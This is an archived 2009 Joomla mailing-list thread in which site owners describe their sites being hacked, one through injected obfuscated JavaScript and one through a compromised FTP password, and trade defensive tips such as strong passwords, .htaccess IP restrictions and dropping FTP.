We found the attacks/IP in the server logs. A financially backed hacker outfit from Nigeria, go figure. The joys of having a PR9 site =P
Our password was 10 chars including letters, numbers and punctuation. We are hosted on a "secured" rackspace server. We don't have FTP running any more! Barrie North ~Fully Managed Joomla Sites~ www.simplweb.com/joomla ~Join the Community at compassdesigns.net~ www.compassdesigns.net/join-the-community.html On Thu, Mar 26, 2009 at 7:29 PM, Atir Javid <atirja...@gmail.com> wrote: > Hello Barrie, > > May I inquire as to how you verified the attack? I know that FTP > bruteforcing is extremely difficult, and that is very improbable. > What you may have faced was a dictionary attack, which may have worked > with some luck if you had a weak password. A password including a mix > of > > 1) UPPERCASE > 2) lowercase > 3) punctuation/!#$., > 4) numbers > > and have a good strong/long password you would never fall victim to > dictionary. > > As for bruteforce, an ftpd simply denies access after 3 or 5 > (configurable, usually defaults to 3) failed login attempts for some > time. Some hosts go as far as restricting ftp access until you call > them and verify the problem. Also, brute forcing over a TCP pipe a > slow protocol such as FTP is virtually impossible. At this rate it > would take YEARS to bruteforce the password if not DECADES. > > @ Other users > Also make sure to go into joomla user configuration and change the > username of 'admin' to something else. > To protect your joomla administation section If you have a static ip, > you can add > > order allow,deny > deny from all > allow from your.static.ip.here > > to a file called .htaccess in your administration folder. If for some > reason your ip changes and you get locked out, simply login via FTP > and update the .htaccess file. There are some other advanced methods > for protecting your administration folder. > > Also, FTP was a protocol developed 30+ years ago. It is not secure, > clear text authentication, etc. FTP must go. If you can help it, do > not use ftp, instead SFTP, or SSH. Just.. anything but FTP. Sadly, > thats all that is easy to use, highly available across all hosts, and > not everyone on shared hosting provides SSH access. If you can do > without it, do without it. http://wooledge.org/mywiki/FtpMustDie > > I have seen more sites hacked due to unpatched php or bad php > code(mostly from 3rd party addons) more than I have with FTP though. > > Still with good security practices you can reduce the risk considerably. > > Peace. > > > > > 2009/3/26 Barrie North <bar...@compassdesigns.net>: > > We got hacked last month by a brute force attack on our FTP password. > Once > > they had that, they got into the Joomla files. > > > > Any site can be hacked. The other half of the equation is vigilance and > > backups :) > > > > Barrie North > > ~Fully Managed Joomla Sites~ > > www.simplweb.com/joomla > > ~Join the Community at compassdesigns.net~ > > www.compassdesigns.net/join-the-community.html > > > > > > On Wed, Mar 25, 2009 at 11:23 PM, Mark Simko <masi...@verizon.net> > wrote: > >> > >> Several of my clients' 1.0.15 sites have been hacked this week! Is > >> there a problem with 1.0? > >> > >> I don't see an announcement on joomla.org > >> > >> I just saw that my site was hacked the other day. Fortunately they > >> bunged it up a bit, so the code didn't run, but instead gave an error > >> message. > >> > >> What they had done is append javascript to the index.php file. It was > >> disguised as ascii codes, and there were several var defined and > >> substituted in, but the result was that it attempted to open a hidden > >> iframe directed to siplank.com. When I tried to open siplank.com in a > >> web browser (yes, I did that! I do lots of crazy things out of > >> curiosity) Firefox stopped it with a warning about the site being known > >> for malware. > >> > >> I'm running 1.5.9 on a shared host. I will be calling my host and asking > >> them what they can find out from their logs as to what happened. > >> > >> _______________________________________________ > >> New York PHP SIG: Joomla! Mailing List > >> http://lists.nyphp.org/mailman/listinfo/joomla > >> > >> NYPHPCon 2006 Presentations Online > >> http://www.nyphpcon.com > >> > >> Show Your Participation in New York PHP > >> http://www.nyphp.org/show_participation.php > > > > > > _______________________________________________ > > New York PHP SIG: Joomla! Mailing List > > http://lists.nyphp.org/mailman/listinfo/joomla > > > > NYPHPCon 2006 Presentations Online > > http://www.nyphpcon.com > > > > Show Your Participation in New York PHP > > http://www.nyphp.org/show_participation.php > > > _______________________________________________ > New York PHP SIG: Joomla! Mailing List > http://lists.nyphp.org/mailman/listinfo/joomla > > NYPHPCon 2006 Presentations Online > http://www.nyphpcon.com > > Show Your Participation in New York PHP > http://www.nyphp.org/show_participation.php >
_______________________________________________ New York PHP SIG: Joomla! Mailing List http://lists.nyphp.org/mailman/listinfo/joomla NYPHPCon 2006 Presentations Online http://www.nyphpcon.com Show Your Participation in New York PHP http://www.nyphp.org/show_participation.php
